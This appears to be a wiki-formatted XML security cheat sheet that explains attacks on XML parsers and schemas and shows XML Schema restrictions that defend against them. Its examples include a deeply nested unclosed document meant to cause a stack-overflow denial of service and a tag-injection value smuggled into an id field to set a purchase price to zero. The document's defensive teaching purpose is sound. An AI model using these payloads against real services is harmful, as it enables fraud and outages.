Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well-formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well-formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add the opening tag of one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD, which offers a very limited set of restrictions compared to other schema languages. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. Both &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; are defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;. The well-formed and valid XML document begins after this definition. The &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; element contains an irrelevant value, but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size of the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server. Typically, this type of element should be restricted to a maximum number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since a DTD cannot express specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
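&lt;br /&gt;
As a sketch of how another schema language can express these restrictions, the following XML Schema describes the same &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt; document. The limits used here (a &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; of at most 256 characters and an &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; of one to three digits no greater than 150) are illustrative assumptions, not values taken from the example above:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;person&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
        &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;age&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:restriction base=&amp;quot;xs:nonNegativeInteger&amp;quot;&amp;gt;&lt;br /&gt;
        &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{1,3}&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:'''maxInclusive''' value=&amp;quot;150&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; facet limits the number of digits, so a long run of leading zeros is rejected as well, while &amp;lt;tt&amp;gt;maxInclusive&amp;lt;/tt&amp;gt; bounds the numeric value.&lt;br /&gt;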
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to a variety of problems. The result could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value and considered the content valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are only partially enforced for the element, which means that the information is probably tested using an application instead of the proposed sample schema.&lt;br /&gt;
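&lt;br /&gt;
For the hexadecimal case mentioned at the beginning of this section, a built-in binary type is usually a better fit than a restricted string. A minimal sketch, assuming a hypothetical element named &amp;lt;tt&amp;gt;token&amp;lt;/tt&amp;gt; that must carry exactly 16 bytes:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;token&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:hexBinary'''&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:length value=&amp;quot;16&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
For &amp;lt;tt&amp;gt;hexBinary&amp;lt;/tt&amp;gt;, the &amp;lt;tt&amp;gt;length&amp;lt;/tt&amp;gt; facet counts octets of binary data rather than characters, so this declaration accepts exactly 32 hexadecimal digits.&lt;br /&gt;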
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, an attacker who provides a negative number might cause a negative result on the user’s account. To avoid that logical vulnerability, &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; should be declared as &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If a less restrictive data type is used instead, a denominator of zero may still reach the application and trigger an error.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
With this schema, setting the price to Infinity or NaN will not trigger any errors in the application, because these values fail validation. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
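&lt;br /&gt;
Note that &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; still accepts negative numbers and an arbitrary number of fraction digits. As a hedged sketch, assuming that prices are never negative and use at most two decimal places (both are assumptions, not requirements stated above), the type could be narrowed further:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;price&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:decimal&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minInclusive''' value=&amp;quot;0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''fractionDigits''' value=&amp;quot;2&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;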
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid.&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a specific length (let's say 8), the exact length can be specified as follows:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values from &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; to &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for an SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components, introduced in XML Schema 1.1, constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed.&lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
